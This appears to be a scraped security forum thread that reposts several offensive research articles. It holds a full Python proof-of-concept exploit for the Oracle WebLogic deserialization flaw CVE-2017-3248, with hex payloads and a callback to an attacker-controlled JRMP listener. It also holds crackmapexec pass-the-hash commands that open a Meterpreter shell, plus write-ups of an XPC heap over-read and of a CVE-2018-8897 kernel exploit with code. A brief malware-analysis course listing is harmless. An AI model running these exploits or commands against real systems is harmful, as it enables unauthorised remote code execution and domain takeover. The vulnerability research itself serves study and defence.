cleaner by typing creds and I then see the domain administrator hashed password. I won’t go the route of cracking the password because that’s too easy. Instead I’ll pass the hash using Crackmapexec. As a PoC, I’ll list the SMB shares of the DC. crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares Success! From here, there are two methods you can use to get a shell, as outlined here. I prefer the Metasploit option. crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 Once multi/handler is listening, the connection comes in after a brief wait And boom! Just like that, domain admin. This is one of many ways to exploit Active Directory misconfigurations to get to domain admin. As stated before, this is not the end of a penetration test though. My next steps here would be to try other methods to get to domain admin or any other accounts because a penetration test is conducted to see what all of the vulnerabilities are in a network, not just one. Additional Resources I recommend reading: http://ethicalhackingblog.com/hacking-powershell-empire-2-0/ https://adsecurity.org/?p=2398 https://github.com/byt3bl33d3r/CrackMapExec https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html Sursa: https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/
  6. Space must be allocated for those vectors. Better to use lists instead: https://www.javatpoint.com/java-list
  7. Catalog Description

Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, and static and dynamic analysis, with IDA Pro, OllyDbg and other tools.

Advisory: CS 110A or equivalent familiarity with programming

Upon successful completion of this course, the student will be able to:
- Describe types of malware, including rootkits, Trojans, and viruses
- Perform basic static analysis with antivirus scanning and strings
- Perform basic dynamic analysis with a sandbox
- Perform advanced static analysis with IDA Pro
- Perform advanced dynamic analysis with a debugger
- Operate a kernel debugger
- Explain malware behavior, including launching, encoding, and network signatures
- Understand anti-reverse-engineering techniques that impede the use of disassemblers, debuggers, and virtual machines
- Recognize common packers and how to unpack them

Videos: https://samsclass.info/126/126_S17.shtml
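As a small taste of the "basic static analysis with strings" outcome listed above, here is a short Python sketch (not part of the course materials) that pulls printable ASCII strings out of a binary, similar to what the Unix strings utility does:

#!/usr/bin/env python3
# Extract printable ASCII strings of a minimum length from a file,
# similar to the Unix `strings` utility used in basic static analysis.
import re
import sys

MIN_LEN = 6

def extract_strings(path, min_len=MIN_LEN):
    data = open(path, "rb").read()
    # Runs of printable ASCII characters (space through tilde).
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

if __name__ == "__main__":
    for s in extract_strings(sys.argv[1]):
        print(s)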
  8. #!/usr/bin/python # -*- coding: utf-8 -*- from argparse import RawTextHelpFormatter import socket, argparse, subprocess, ssl, os.path HELP_MESSAGE = ''' -------------------------------------------------------------------------------------- Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com) This script is the first public exploit/POC for: - Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution) - Checking if a weblogic server is vulnerable This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial) Version affected (according to Oracle): - 10.3.6.0 - 12.1.3.0 - 12.2.1.0 - 12.2.1.1 -------------------------------------------------------------------------------------- ''' ''' Tested on 12.1.2.0 For technical information, see: - https://www.tenable.com/security/research/tra-2017-07 - http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html Vulnerability identified by Jacob Baines (Tenable Network Security) but exploit/POC has not been published! ''' #COMMANDS ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP) CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command #PAYLOADS #A. Packet 1 to send: payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a' #B. Packet 2 to send: payload_2 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f676
9632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e32323700124141414141414141414141413154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3131312e3131312e302e31313161863d1d0000000078' #C. Packet 3 to send: #C.1 length payload_3_1 = "000003b3" #C.2 first part payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000' #C.3.1 sub payload payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' #C.3.2 Ysoserial Payload generated in real time payload_3_3_2 = "" #C.4 End of the payload payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' def runCmd(cmd): proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = proc.stdout.read() + proc.stderr.read() return stdout_value def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath): completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort)) print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd)) stdout = runCmd(cmd = completeCmd) return stdout def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""): if testOnly == True: attackerIP = "127.0.0.1" attackerJRMPPort = 0 print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort) if sslEnabled == True: print "[+] ssl mode enabled" s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) else: s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) print "[+] ssl mode disabled" s.connect((targetIP, targetPort)) print "[+] Connected to {0}:{1}".format(targetIP, targetPort) print "[+] Sending first packet..." #print "[S1] Sending {0}".format(repr(payload_1.decode('hex'))) s.sendall(payload_1.decode('hex')) data = s.recv(4096) #print '[R1] Received', repr(data) print "[+] Sending second packet..." #print "[S2] Sending {0}".format(repr(payload_2.decode('hex'))) s.sendall(payload_2.decode('hex')) data = s.recv(4096) #print '[R2] Received', repr(data) print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..." payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath) payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4 payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1) sendata = payload.decode('hex') if testOnly == False: print "[+] You have to execute the following command locally:" print " {0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd)) raw_input("[+] Press Enter when this previous command is running...") print "[+] Sending third packet..." #print "[S3] Sending {0}".format(repr(sendata)) s.sendall(sendata) data = s.recv(4096) s.close() #print '[R3] Received', repr(data) if testOnly == True: if "cannot be cast to weblogic" in str(data): print "[+] 'cannot be cast to weblogic' string in the third response from server" print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server" print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort) print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort) def main(): argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter) argsParsed.add_argument("-t", dest='target', required=True, help='target IP') argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port') argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip') argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)') argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target') argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable') argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection') argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path') argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)') args = dict(argsParsed.parse_args()._get_kwargs()) if os.path.isfile(args['ysoPath'])==False: print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!" return -1 if args['check'] == False and args['attackerIP'] == None: print "[-] You have to give an IP with --jip !" 
return -1 elif args['check'] == False and args['cmdToExecute'] == None: print "[-] You have to give a command to execute on the target with --cmd !" return -1 if args['check'] == True: print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath']) else: print "[+] Exploiting target {0}:{1}...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath']) if __name__ == "__main__": main() Sursa: https://www.exploit-db.com/exploits/44998/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter
  9. Reading process memory using XPC strings by Brandon Azad July 9, 2018 This is a short post about another bug I discovered mostly by accident. While reversing libxpc, I noticed that XPC string deserialization does not check whether the deserialized string is actually as long as the serialized length claims: it could be shorter. That is, the serialized XPC message might claim that the string is 1000 bytes long even though the string contains a null byte at index 100. The resulting OS_xpc_string object will then think its C string on the heap is longer than it actually is. While directly exploiting this vulnerability to execute arbitrary code is difficult, there’s another path we can take. The length field of an OS_xpc_string object is trusted when serializing the string into a message, so if we can get an XPC service to send us back the string it just deserialized, it will over-read from the heap C-string buffer and send us all of that extra data in the message, giving us a snapshot of that process’s heap memory. The resulting exploit primitive is similar to how the Heartbleed vulnerability could be used to over-read heap data from an OpenSSL-powered server’s memory. (XP)C strings and null bytes I was actually disassembling libxpc in order to understand the wire format when I noticed a peculiarity about the string deserialization function, _xpc_string_deserialize: OS_xpc_string *__fastcall _xpc_string_deserialize(OS_xpc_serializer *xserializer) { OS_xpc_string *xstring; // rbx@1 char *string; // rax@4 char *contents; // [rsp+8h] [rbp-18h]@1 size_t size; // [rsp+10h] [rbp-10h]@1 MAPDST xstring = 0LL; contents = 0LL; size = 0LL; if ( _xpc_string_get_wire_value(xserializer, (const char **)&contents, &size) ) { if ( contents[size - 1] || (string = _xpc_try_strdup(contents)) == 0LL ) { xstring = 0LL; } else { xstring = _xpc_string_create(string, size - 1); LOBYTE(xstring->flags) |= 1u; } } return xstring; } If you look carefully, you’ll notice that a particular check is missing. The function _xpc_string_get_wire_value seems to get a pointer to the data bytes of the string and the reported length of the string. The code then checks whether the byte at index size - 1 is null before duplicating the string and creating the actual OS_xpc_string object with _xpc_string_create, passing the duplicated string and size - 1. The check that contents[size - 1] is null does ensure that the serialized string is no longer than size bytes, but it does not ensure that the string is not shorter than size bytes: there could be a null byte earlier in the serialized string data. This is problematic because the unchecked size value gets propagated to the resulting OS_xpc_string object through the function _xpc_string_create, which leads to inconsistencies between the string object’s reported length and actual length on the heap. Exploitation by XPC message reflection Any nontrivial exploit would have to leverage the disagreement between the resulting XPC string object’s length and the contents of its heap buffer. This means that we need to find code in some XPC service that uses both the length field and the string contents in a significant way.
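To make that length/contents mismatch concrete before looking at how it can be abused, here is a toy Python model of the pattern (purely illustrative: it simulates the idea with a byte buffer and is not libxpc's wire format or actual code):

# Toy model of the mismatch described above: deserialization only checks that the
# byte at index size-1 is NUL, while serialization later trusts the stored length.
heap = b"short\x00" + b"SECRET-HEAP-DATA" + b"\x00"   # stand-in for the heap buffer

def deserialize(buf, claimed_size):
    # Missing check: nothing verifies there is no NUL byte before claimed_size-1.
    if buf[claimed_size - 1] != 0:
        return None
    return {"length": claimed_size - 1, "contents": buf}

def serialize(xstring):
    # Mirrors the idea of _xpc_string_serialize: copy length+1 bytes based on the trusted length.
    return xstring["contents"][: xstring["length"] + 1]

xstring = deserialize(heap, len(heap))
print(serialize(xstring))   # the "message" now includes SECRET-HEAP-DATA past the short C string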
Unfortunately, usage patterns that could lead to memory corruption seemed unlikely; you'd need to write some pretty convoluted code to make a too-short string overwrite a buffer:

xpc_object_t string = xpc_dictionary_get_value(message, "key");
char buf[strlen(xpc_string_get_string_ptr(string))];
memcpy(buf, xpc_string_get_string_ptr(string), xpc_string_get_length(string));

Not surprisingly, I couldn't find any iOS services that use XPC strings in a way that could lead to memory corruption. However, there's still another way to exploit this bug to perform useful work, and that's by leveraging libxpc's own behavior in services that reflect XPC messages back to the client.

Even though no clients of libxpc use an OS_xpc_string object's length field in a significant way, there are parts of the libxpc library itself that do: in particular, the XPC string serialization code does trust the stored length field while copying the string contents into the XPC message. This is the decompiled implementation of _xpc_string_serialize:

void __fastcall _xpc_string_serialize(OS_xpc_string *string, OS_xpc_serializer *serializer)
{
    int type; // [rsp+8h] [rbp-18h]@1
    int size; // [rsp+Ch] [rbp-14h]@1

    type = *((_DWORD *)&OBJC_CLASS___OS_xpc_string + 10);
    _xpc_serializer_append(serializer, &type, 4uLL, 1, 0, 0);
    size = LODWORD(string->length) + 1;
    _xpc_serializer_append(serializer, &size, 4uLL, 1, 0, 0);
    _xpc_serializer_append(serializer, string->string, string->length + 1, 1, 0, 0);
}

The OS_xpc_string's length parameter is trusted when serializing the string, causing that many bytes to be copied from the heap into the serialized message. If the deserialized string was shorter than its reported length, the message will be filled with out-of-bounds heap data. Exploitation is still limited to XPC services that reflect some part of the XPC message back to the client, but this is much more common.

Targeting diagnosticd

On macOS and iOS, diagnosticd is a promising candidate for exploitation, not least because it is unsandboxed, root, and task_for_pid-allow. Diagnosticd is responsible for processing diagnostic messages (for example, messages generated by os_log) and streaming them to clients interested in receiving these messages. By registering to receive our own diagnostic stream and then sending a diagnostic message with a shorter than expected string, we can obtain a snapshot of some of the data in diagnosticd's heap, which can aid in getting code execution in the process.

I wrote up a proof-of-concept exploit called xpc-string-leak that can be used to sample arbitrarily-sized sections of out-of-bounds heap content from diagnosticd. The exploit flow is fairly straightforward: we register a Mach port with diagnosticd to receive a stream of diagnostic messages from our own process, generate a diagnostic message with a malformed too-short string, then listen on the port we registered earlier for the message from diagnosticd containing out-of-bounds heap data.

Interestingly, because diagnosticd receives logging messages from other processes, it is possible that the out-of-bounds heap data might contain sensitive information from other processes as well. Thus, there are user privacy implications to this bug even without achieving code execution in diagnosticd.

Timeline

I discovered this bug early in 2018 (January or February), but forgot to investigate it until May. I reported the issue to Apple on May 9, and it was assigned CVE-2018-4248 and patched in iOS 11.4.1 and macOS 10.13.6 on July 9.
Sursa: http://bazad.github.io/2018/07/xpc-string-leak/
  10. Arbitrary Code Execution at Ring 0 using CVE-2018-8897 Can BölükMay 11, 201871324.7k Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom. 0x0: Setting Up the Basics The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode. We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines like shown below: #include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } } This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit. Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster: #include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } } 0x1: Fixing the KPCR Data Here are the few cases we have to modify GSBASE contents to pass through successfully: – KiDebugTrapOrFault KiDebugTrapOrFault: ... 
MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. 
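Before moving on, it may help to see the section 0x1 fix-ups collected in one place. The following is a rough Python sketch of the fake GSBASE layout implied by the snippets above; the 0x18 offset for Pcr.Self, the buffer sizes and the placeholder user-mode addresses are assumptions, while the other offsets and values are taken directly from the walkthrough (in the real exploit the addresses would come from VirtualAlloc'd buffers).

import struct

PCR_SIZE         = 0x8000
fake_pcr         = bytearray(PCR_SIZE)
fake_kthread     = bytearray(0x1000)
FAKE_PCR_VA      = 0x140000000   # hypothetical user-mode addresses; a real
FAKE_KTHREAD_VA  = 0x140010000   # exploit would use the actual buffer bases
FAKE_KPROCESS_VA = 0x140020000

def q(buf, off, val): struct.pack_into('<Q', buf, off, val)   # write qword
def d(buf, off, val): struct.pack_into('<I', buf, off, val)   # write dword

q(fake_pcr, 0x18, FAKE_PCR_VA)                     # Pcr.Self (offset assumed)
q(fake_pcr, 0x20, FAKE_PCR_VA + 0x180)             # Pcr.CurrentPrcb = Pcr + 0x180
d(fake_pcr, 0x180, 0x1F80)                         # Prcb.MxCsr, valid default value
q(fake_pcr, 0x188, FAKE_KTHREAD_VA)                # Prcb.CurrentThread
q(fake_pcr, 0x1A8, 1)                              # Prcb.RspBase, must differ from InitialStack
q(fake_pcr, 0x180 + 0x62C0, FAKE_PCR_VA + 0x3000)  # Prcb.Context -> scratch area for now

q(fake_kthread, 0x28, 0)                           # KThread.InitialStack = 0
q(fake_kthread, 0xB8, FAKE_KPROCESS_VA)            # KThread.ApcStateFill.Process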
I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... 
